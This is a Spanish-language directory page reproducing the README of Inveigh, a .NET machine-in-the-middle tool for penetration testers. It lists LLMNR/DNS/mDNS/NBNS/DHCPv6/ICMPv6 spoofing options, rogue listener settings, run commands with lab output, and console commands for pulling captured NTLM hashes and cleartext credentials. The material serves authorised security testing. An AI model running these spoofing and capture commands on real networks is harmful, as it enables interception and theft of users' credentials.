Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Inveigh — Herramienta de intermediario .NET para IPv4/IPv6 para pentesters | Kitploit
Herramientas/GitHubGitHub/kevin-robertson/inveigh
Pruebas de PenetraciónRed Teaming
GitHubkevin-robertson/inveigh

Inveigh

Herramienta de intermediario .NET para IPv4/IPv6 para pentesters

Ver Repositorio
3.0k4721hace 9 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Inveigh

Inveigh es una herramienta multiplataforma .NET IPv4/IPv6 de intermediario (machine-in-the-middle) para probadores de penetración. Este repositorio contiene la versión principal en C# así como la versión heredada en PowerShell.

Resumen

Inveigh realiza ataques de suplantación y capturas de hashes/credenciales tanto mediante la captura de paquetes como mediante oyentes/sockets específicos de protocolo. El método de captura de paquetes, que fue la base de la versión original en PowerShell de esta herramienta, tiene las siguientes ventajas:

  • Capturas de desafío/respuesta NTLM a través del servicio SMB de Windows
  • Menos enlaces de puertos visibles en el sistema anfitrión

La principal desventaja es el acceso elevado requerido.

En las versiones actuales de Windows, los servicios UDP en ejecución por defecto permiten la reutilización de puertos. Por lo tanto, la captura de paquetes ya no proporciona una ventaja para evitar puertos UDP en uso. Todos los oyentes UDP de Inveigh están configurados para aprovechar la reutilización de puertos.

Descripciones de Versiones

  • PowerShell Inveigh - versión original desarrollada durante muchos años. Por ahora al menos, esta versión (1.506) se quedará sin actualizaciones adicionales. La documentación se puede encontrar aquí.
  • C# Inveigh (también conocido como InveighZero) - código POC original en C# combinado con un puerto a C# de la mayor parte del código de la versión de PowerShell. Esta versión ha sido reconstruida para C# y está asumiendo el rol de versión principal.

Características

La versión C# de Inveigh contiene ataques para los siguientes protocolos:

  • LLMNR [capturador de paquetes | oyente]
  • DNS [capturador de paquetes | oyente]
  • mDNS [capturador de paquetes | oyente]
  • NBNS [capturador de paquetes | oyente]
  • DHCPv6 [capturador de paquetes | oyente]
  • ICMPv6 [socket en bruto privilegiado]
  • HTTP [oyente]
  • HTTPS [oyente]
  • SMB [capturador de paquetes | oyente]
  • LDAP [oyente]
  • WebDAV [oyente]
  • Proxy Auth [oyente]

Inveigh funciona tanto con IPv4 como con IPv6 en los casos en que el protocolo subyacente proporciona soporte para ambos.

Soporte Multiplataforma

El archivo de proyecto estilo SDK de Inveigh está configurado para .NET 3.5, 4.6.2 y 6.0, siendo 6.0 la versión que también funciona con Linux y macOS.

<TargetFrameworks>net35;net62;net6.0</TargetFrameworks>

Problemas Conocidos

  • El capturador de paquetes solo está disponible en Windows debido a diferencias en la configuración de sockets en bruto. Cuando se compila para Linux o macOS, el capturador de paquetes simplemente se desactiva. En su lugar, se puede usar el oyente SMB de Inveigh si el puerto 445 está abierto.
  • macOS requiere que existan rutas para unirse a grupos multicast. En mis pruebas, he tenido que agregar rutas para multicast DHCPv6 para poder llevar a cabo ese ataque en esta plataforma.
    sudo route -nv add -net ff02::1:2 -interface en0

Ejecución

dotnet Inveigh.dll

Compilaciones Dirigidas a Plataformas Linux/macOS

  • Con .NET 6.0 instalado en el sistema de destino
    dotnet publish -r linux-x64 -f net8.0 -p:AssemblyName=inveigh
    dotnet publish -r osx-x64 -f net8.0 -p:AssemblyName=inveigh

  • Sin .NET 6.0 instalado en el sistema de destino
    dotnet publish --self-contained=true -p:PublishSingleFile=true -r linux-x64 -f net8.0 -p:AssemblyName=inveigh
    dotnet publish --self-contained=true -p:PublishSingleFile=true -r osx-x64 -f net8.0 -p:AssemblyName=inveigh

Uso

Los valores predeterminados de los parámetros se encuentran al inicio de Program.cs. Recomiendo revisar y configurar todo según sus necesidades antes de compilar. Todos los parámetros de habilitar/deshabilitar se pueden establecer con valores Y/N.``` //begin parameters - set defaults as needed before compile public static string argCert = "MIIKaQIBAzCCC..." public static string argCertPassword = "password"; public static string argChallenge = ""; public static string argConsole = "5"; public static string argConsoleLimit = "-1"; public static string argConsoleStatus = "0"; public static string argConsoleUnique = "Y"; public static string argDHCPv6 = "N"; public static string argDHCPv6TTL = "30"; public static string argDNS = "Y"; ... //end parameters

root@kitploit:~
### Ayuda de Parámetros```
.\Inveigh.exe -?

Control:

  -Inspect        Default=Disabled: (Y/N) inspect traffic only.

  -IPv4           Default=Enabled: (Y/N) IPv4 spoofing/capture.

  -IPv6           Default=Enabled: (Y/N) IPv6 spoofing/capture.

  -RunCount       Default=Unlimited: Number of NetNTLM captures to perform before auto-exiting.

  -RunTime        Default=Unlimited: Run time duration in minutes.


Output:

  -Console        Default=5: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no disabled, no informational, 3=no disabled, no filtered, 4=no disabled, 5=all)  

  -ConsoleLimit   Default=Unlimited: Limit to queued console entries.

  -ConsoleStatus  Default=Disabled: Interval in minutes for auto-displaying capture details.

  -ConsoleUnique  Default=Enabled: (Y/N) displaying only unique (user and system combination) hashes at time of capture.

  -FileDirectory  Default=Working Directory: Valid path to an output directory for enabled file output.

  -FileOutput     Default=Enabled: (Y/N) real time file output.

  -FilePrefix     Default=Inveigh: Prefix for all output files.

  -FileUnique     Default=Enabled: (Y/N) outputting only unique (user and system combination) hashes.

  -LogOutput      Default=Disabled: (Y/N) outputting log entries.


Spoofers:

  -DHCPV6         Default=Disabled: (Y/N) DHCPv6 spoofing.

  -DHCPv6TTL      Default=300: Lease lifetime in seconds.

  -DNS            Default=Enabled: (Y/N) DNS spoofing.

  -DNSHost        Fully qualified hostname to use SOA/SRV responses.

  -DNSSRV         Default=LDAP: Comma separated list of SRV request services to answer.

  -DNSSuffix      DNS search suffix to include in DHCPv6/ICMPv6 responses.

  -DNSTTL         Default=30: DNS TTL in seconds.

  -DNSTYPES       Default=A: (A, AAAA, SOA, SRV) Comma separated list of DNS types to spoof.

  -ICMPv6         Default=Enabled: (Y/N) sending ICMPv6 router advertisements.

  -ICMPv6Interval Default=200: ICMPv6 RA interval in seconds.
  
  -ICMPv6TTL	  Default=300: ICMPv6 TTL in seconds.

  -IgnoreDomains  Default=None: Comma separated list of domains to ignore when spoofing.



  -IgnoreIPs      Default=Local: Comma separated list of source IP addresses to ignore when spoofing.

  -IgnoreMACs     Default=Local: Comma separated list of MAC addresses to ignore when DHCPv6 spoofing.
  
  -IgnoreQueries  Default=None: Comma separated list of name queries to ignore when spoofing.

  -Local          Default=Disabled: (Y/N) performing spoofing attacks against the host system.

  -LLMNR          Default=Enabled: (Y/N) LLMNR spoofing.

  -LLMNRTTL       Default=30: LLMNR TTL in seconds.

  -MAC            Local MAC address for DHCPv6.

  -MDNS           Default=Enabled: (Y/N) mDNS spoofing.

  -MDNSQuestions  Default=QU,QM: Comma separated list of question types to spoof. (QU,QM)

  -MDNSTTL        Default=120: mDNS TTL in seconds.

  -MDNSTypes      Default=A: Comma separated list of mDNS record types to spoof. (A,AAAA,ANY)

  -MDNSUnicast    Default=Enabled: (Y/N) sending a unicast only response to a QM request.

  -NBNS           Default=Disabled: (Y/N) NBNS spoofing.

  -NBNSTTL        Default=165: NBNS TTL in seconds.

  -NBNSTypes      Default=00,20: Comma separated list of NBNS types to spoof. (00,03,20,1B)

  -ReplyToDomains Default=All: Comma separated list of domains to respond to when spoofing.

  -ReplyToIPs     Default=All: Comma separated list of source IP addresses to respond to when spoofing.

  -ReplyToMACs    Default=All: Comma separated list of MAC addresses to respond to when DHCPv6 spoofing.
  
  -ReplyToQueries Default=All: Comma separated list of name queries to respond to when spoofing.

  -SpooferIP      Default=Autoassign: IP address included in spoofing responses.

  -SpooferIPv6    Default=Autoassign: IPv6 address included in spoofing responses.

  -Repeat         Default=Enabled: (Y/N) repeated spoofing attacks against a system after NetNTLM capture.


Capture:

  -Cert           Base64 certificate for TLS.

  -CertPassword   Base64 certificate password for TLS.

  -Challenge      Default=Random per request: 16 character hex NetNTLM challenge for use with the TCP listeners.

  -HTTP           Default=Enabled: (Y/N) HTTP listener.

  -HTTPAuth       Default=NTLM: (Anonymous/Basic/NTLM) HTTP/HTTPS listener authentication.

  -HTTPPorts      Default=80: Comma seperated list of TCP ports for the HTTP listener.

  -HTTPRealm      Default=ADFS: Basic authentication realm.

  -HTTPResponse   Content to serve as the default HTTP/HTTPS/Proxy response.

  -HTTPS          Default=Enabled: (Y/N) HTTPS listener.

  -HTTPSPorts     Default=443: Comma separated list of TCP ports for the HTTPS listener.

  -IgnoreAgents   Default=Firefox: Comma separated list of HTTP user agents to ignore with wpad and proxy auth.

  -LDAP           Default=Enabled: (Y/N) LDAP listener.

  -LDAPPorts      Default=389: Comma separated list of TCP ports for the LDAP listener.

  -ListenerIP     Default=Any: IP address for all listeners.

  -ListenerIPv6   Default=Any: IPv6 address for all listeners.

  -MachineAccount Default=Enabled: (Y/N) machine account NetNTLM captures.

  -Proxy          Default=Disabled: (Y/N) proxy listener authentication captures.

  -ProxyAuth      Default=NTLM: (Basic/NTLM) Proxy authentication.

  -ProxyPort      Default=8492: Port for the proxy listener.

  -SMB            Default=Enabled: (Y/N) SMB sniffer/listener.

  -SMBPorts       Default=445: Port for the SMB listener.

  -SnifferIP      Default=Autoassign: IP address included in spoofing responses.

  -SnifferIPv6    Default=Autoassign: IPv6 address included in spoofing responses.

  -WebDAV         Default=Enabled: (Y/N) serving WebDAV over HTTP/HTTPS listener.

  -WebDAVAuth     Default=NTLM: (Anonymous/Basic/NTLM) WebDAV authentication.

  -WPADAuth       Default=Enabled: (Y/N) authentication type for wpad.dat requests. (Anonymous/Basic/NTLM)

  -WPADResponse   Default=Autogenerated: Contents of wpad.dat responses.

Default (detección automática de IPs locales)```

.\Inveigh.exe [] Inveigh 2.0 [Started 2021-06-15T00:08:37 | PID 12588] [+] Packet Sniffer Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2] [+] Listener Addresses [IP 0.0.0.0 | IPv6 ::] [+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2] [+] Spoofer Options [Repeat Enabled | Local Attacks Disabled] [-] DHCPv6 [+] DNS Packet Sniffer [Type A] [-] ICMPv6 [+] LLMNR Packet Sniffer [Type A] [-] MDNS [-] NBNS [+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80] [-] HTTPS [+] WebDAV [WebDAVAuth NTLM] [-] Proxy [+] LDAP Listener [Port 389] [+] SMB Packet Sniffer [Port 445] [+] File Output [C:\Users\dev\source\repos\Inveigh\Inveigh\bin\Debug\net35] [+] Previous Session Files [Imported] [] Press ESC to enter/exit interactive console

root@kitploit:~
### Modo solo de escucha (sniffer de paquetes deshabilitado)```
.\Inveigh.exe -sniffer n
[*] Inveigh 2.0 [Started 2021-06-14T10:48:16 | PID 20368]
[-] Packet Sniffer
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[-] DHCPv6
[+] DNS Listener [Type A]
[-] ICMPv6
[+] LLMNR Listener [Type A]
[-] MDNS
[-] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[-] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[-] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Listener [Port 445]
[+] File Output [C:\Users\dev\source\repos\InveighZero\Inveigh\bin\Debug\net35]
[+] Previous Session Files [Imported]
[*] Press ESC to enter/exit interactive console
[!] Failed to start SMB listener on port 445, check IP and port usage.
[!] Failed to start SMB listener on port 445, check IP and port usage.

Nota, con el sniffer de paquetes desactivado, Inveigh intentará iniciar listeners SMB para IPv4 e IPv6. En la mayoría de los sistemas Windows, el puerto 445 ya estará en uso. Ignore el error o agregue -smb n.

DHCPv6

Inicie el spoofer DHCPv6 y el spoofer DNS IPv6. Nota, DNS está activado por defecto.``` .\Inveigh.exe -dhcpv6 y ... [+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53] [+] DNS Listener [Type A] ... [+] [23:03:06] DHCPv6 [solicitation] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent] [+] [23:03:06] DHCPv6 [fe80::1348:1] advertised to [00:0C:29:F0:6E:16] [+] [23:03:06] DHCPv6 [request] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent] [+] [23:03:06] DHCPv6 [fe80::1348:1] leased to [00:0C:29:F0:6E:16]

root@kitploit:~
Inicia el suplantador DHCPv6 y suplanta las solicitudes DNS solo para el dominio interno.```
.\Inveigh.exe -dhcpv6 y -replytodomains lab.inveigh.org
...
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]
[+] DNS Listener [Type A]
...
[-] [23:10:30] DNS(A) request [test.inveigh.org] from fe80::6142:1%2 [domain ignored]
[+] [23:10:33] DNS(A) request [wpad.lab.inveigh.org] from fe80::6142:1%2 [response sent]

Iniciar el DHCPv6 spoofer y también enviar paquetes ICMPv6 RA.``` .\Inveigh.exe -dhcpv6 y -icmpv6 y ... [+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53] [+] DNS Listener [Type A] [+] ICMPv6 Router Advertisement [Interval 200 Seconds] ... [+] [23:12:04] ICMPv6 router advertisment sent to [ff02::1]

root@kitploit:~
Iniciar el DHCPv6 spoofer y responder a las solicitudes del host local.```
.\Inveigh.exe -dhcpv6 y -local y
...
[+] Spoofer Options [Repeat Enabled | Local Attacks Enabled]
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]

DNS

Suplantar solicitudes SRV además de A.``` .\Inveigh.exe -dnstypes A,SRV -dnshost fake.lab.inveigh.org ... [+] DNS Listener [Types A:SRV] ... [+] [23:21:05] DNS(SRV) request [_ldap._tcp.dc._msdcs.lab.inveigh.org] from fe80::242d:f99e:7534:b46f%2 [response sent]

root@kitploit:~
### <a name="ICMPv6"></a>ICMPv6
Envía paquetes ICMPv6 para inyectar un servidor DNS secundario IPv6 en sistemas de subred local.```
.\Inveigh.exe -icmpv6 y
...
[+] ICMPv6 Router Advertisement [Option DNS | Interval 200 Seconds]
...
[+] [23:35:46] ICMPv6 router advertisement with DNSv6 sent to [ff02::1]

Envía paquetes ICMPv6 para inyectar un sufijo de búsqueda DNS adicional en sistemas de la subred local.``` .\Inveigh.exe -icmpv6 y -dnssuffix inveigh.net ... [+] ICMPv6 Router Advertisement [Option DNS Suffix | Interval 200 Seconds] ... [+] [23:41:17] ICMPv6 router advertisement with DNS Suffix sent to [ff02::1]

root@kitploit:~
### <a name="LLMNR"></a>LLMNR
Suplantar solicitudes AAAA en lugar de A.```
.\Inveigh.exe -llmnrtypes AAAA
...
[+] LLMNR Listener [Type AAAA]
...
[-] [23:23:38] LLMNR(A) request [test] from fe80::bd92:a800:60d0:8deb%2 [type ignored]
[-] [23:23:38] LLMNR(A) request [test] from 10.10.2.201 [type ignored]
[+] [23:23:38] LLMNR(AAAA) request [test] from 10.10.2.201 [response sent]
[+] [23:23:38] LLMNR(AAAA) request [test] from fe80::bd92:a800:60d0:8deb%2 [response sent]

mDNS

Iniciar el suplantador mDNS y enviar respuestas unicast a las solicitudes QM.``` .\Inveigh.exe -mdns y ... [+] MDNS Listener [Questions QU:QM | Type A] ... [+] [23:25:58] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent] [+] [23:25:58] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent] [-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from 10.10.2.201 [type ignored] [-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [type ignored]

root@kitploit:~
Iniciar mDNS spoofer y enviar respuestas multicast a solicitudes QM.```
.\Inveigh.exe -mdns y -mdnsunicast n
...
[+] MDNS Listener [Questions QU:QM | Type A]
...
[+] [23:28:26] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent]
[+] [23:28:26] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent]

NBNS

Iniciar NBNS spoofer``` .\Inveigh.exe -nbns y ... [+] NBNS Listener [Types 00:20] ... [+] [23:33:09] NBNS(00) request [TEST] from 10.10.2.201 [response sent]

root@kitploit:~
### <a name="HTTP"></a>HTTP
Iniciar listener HTTP en el puerto 80 (habilitado por defecto)```
.\Inveigh.exe 
...
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
...

Iniciar escuchadores HTTP en múltiples puertos``` .\Inveigh.exe -httpports 80,8080 ... [+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Ports 80:8080] ...

root@kitploit:~
### <a name="HTTPS"></a>HTTPS
Iniciar el oyente HTTPS en el puerto 443 con el certificado predeterminado de Inveigh```
.\Inveigh.exe -https y
...
[+] HTTPS Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 443]
...

SMB

Iniciar el sniffer de paquetes SMB (habilitado por defecto)``` .\Inveigh.exe ... [+] SMB Packet Sniffer [Port 445] ...

root@kitploit:~
Iniciar SMB listener en el puerto 445```
.\Inveigh.exe -sniffer n
...
[+] SMB Listener [Port 445]
...

LDAP

Iniciar el listener LDAP en el puerto 389``` .\Inveigh.exe ... [+] LDAP Listener [Port 389] ...

root@kitploit:~
### <a name="WebDAV"></a>WebDAV
Inicia el listener HTTP con soporte WebDAV (habilitado por defecto)```
.\Inveigh.exe
...
[+] WebDAV [WebDAVAuth NTLM]
...

Autenticación de proxy

Habilitar captura de autenticación de proxy en el puerto 8492``` .\Inveigh.exe -proxy y ... [+] Proxy Listener [ProxyAuth NTLM | Port 8492] ...

root@kitploit:~
## Consola

Inveigh contiene una consola a la que se puede acceder mientras la herramienta está en ejecución (presione escape para entrar y salir). La consola proporciona acceso fácil a credenciales/hashes capturados y otra información diversa. El prompt de la consola proporciona actualizaciones en tiempo real de los conteos de captura de texto plano, NTLMv1 y NTLMv2 en el formato único:total. Nota: la consola puede ser inaccesible cuando se ejecuta a través de C2.

### Ayuda de la consola interactiva - ingrese ? o HELP```
=============================================== Inveigh Console Commands ===============================================

Command                           Description
========================================================================================================================
GET CONSOLE                     | get queued console output
GET DHCPv6Leases                | get DHCPv6 assigned IPv6 addresses
GET LOG                         | get log entries; add search string to filter results
GET NTLMV1                      | get captured NTLMv1 hashes; add search string to filter results
GET NTLMV2                      | get captured NTLMv2 hashes; add search string to filter results
GET NTLMV1UNIQUE                | get one captured NTLMv1 hash per user; add search string to filter results
GET NTLMV2UNIQUE                | get one captured NTLMv2 hash per user; add search string to filter results
GET NTLMV1USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv1 hashes
GET NTLMV2USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv2 hashes
GET CLEARTEXT                   | get captured cleartext credentials
GET CLEARTEXTUNIQUE             | get unique captured cleartext credentials
GET REPLYTODOMAINS              | get ReplyToDomains parameter startup values
GET REPLYTOIPS                  | get ReplyToIPs parameter startup values
GET REPLYTOMACS                 | get ReplyToMACs parameter startup values
GET REPLYTOQUERIES              | get ReplyToQueries parameter startup values
GET IGNOREDOMAINS               | get IgnoreDomains parameter startup values
GET IGNOREIPS                   | get IgnoreIPs parameter startup values
GET IGNOREMACS                  | get IgnoreMACs parameter startup values
GET IGNOREQUERIES               | get IgnoreQueries parameter startup values
SET CONSOLE                     | set Console parameter value
HISTORY                         | get command history
RESUME                          | resume real time console output
STOP                            | stop Inveigh

Prompt de Consola Interactiva

El prompt de la consola contiene conteos de captura en tiempo real.``` C(0:0) NTLMv1(0:0) NTLMv2(0:0)>

root@kitploit:~
Texto claro(únicos:total) NTLMv1(únicos:total) NTLMv2(únicos:total)

## Quiddity

La librería de protocolo utilizada por Inveigh se encuentra [aquí](https://github.com/Kevin-Robertson/Quiddity).

## Agradecimientos Especiales  
* Responder - https://github.com/lgandx/Responder  
* Impacket - https://github.com/SecureAuthCorp/impacket  
* mitm6 - https://github.com/fox-it/mitm6
Descargar herramienta